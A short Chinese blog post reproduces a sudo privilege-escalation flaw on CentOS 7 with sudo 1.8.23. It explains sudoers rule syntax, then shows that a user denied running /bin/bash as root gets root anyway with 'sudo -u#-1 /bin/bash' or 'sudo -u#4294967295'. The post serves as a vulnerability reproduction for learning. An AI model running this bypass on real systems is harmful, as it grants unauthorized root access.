linux sudo漏洞复现

复现此漏洞之前，先了解一下如何配置sudo权限。

在/etc/sudoers文件中配置sudo权限，配置命令为:

---

username ¹ ALL²=(ALL³) ALL⁴

1:需要添加权限的用户名

2：可以执行sudo命令的主机，这里为所有主机

3：执行sudo命令时以哪个用户的身份执行，这里为所有用户。可以用！来表示不能用的身份。

4：sudo 可以执行的名令，这里为所有命令。

---

 

环境：CentOS7   

sudo版本：1.8.23

 

 

第一步：添加sudo权限，hello用户不能已root用户执行/bin/bash命令

 

第二步：切换到hello用户，已root用户执行/bin/bash命令，不成功

 

第三步：执行sudo -u#-1 /bin/base命令，成功执行。执行sudo -u#4294967295 /bin/bash同样能成功。

 

 

 

 参考文章：

1. sudo命令与权限配置：https://blog.csdn.net/wanglei_storage/article/details/73065238
2. linux sudo漏洞复现：https://mp.weixin.qq.com/s/bb6Hd3JdYiLilqdP_-INtA https://mp.weixin.qq.com/s/bb6Hd3JdYiLilqdP_-INtA
3. linux sudo漏洞分析：https://www.freebuf.com/news/216821.html

 

来源：https://www.cnblogs.com/do-do/p/11679548.html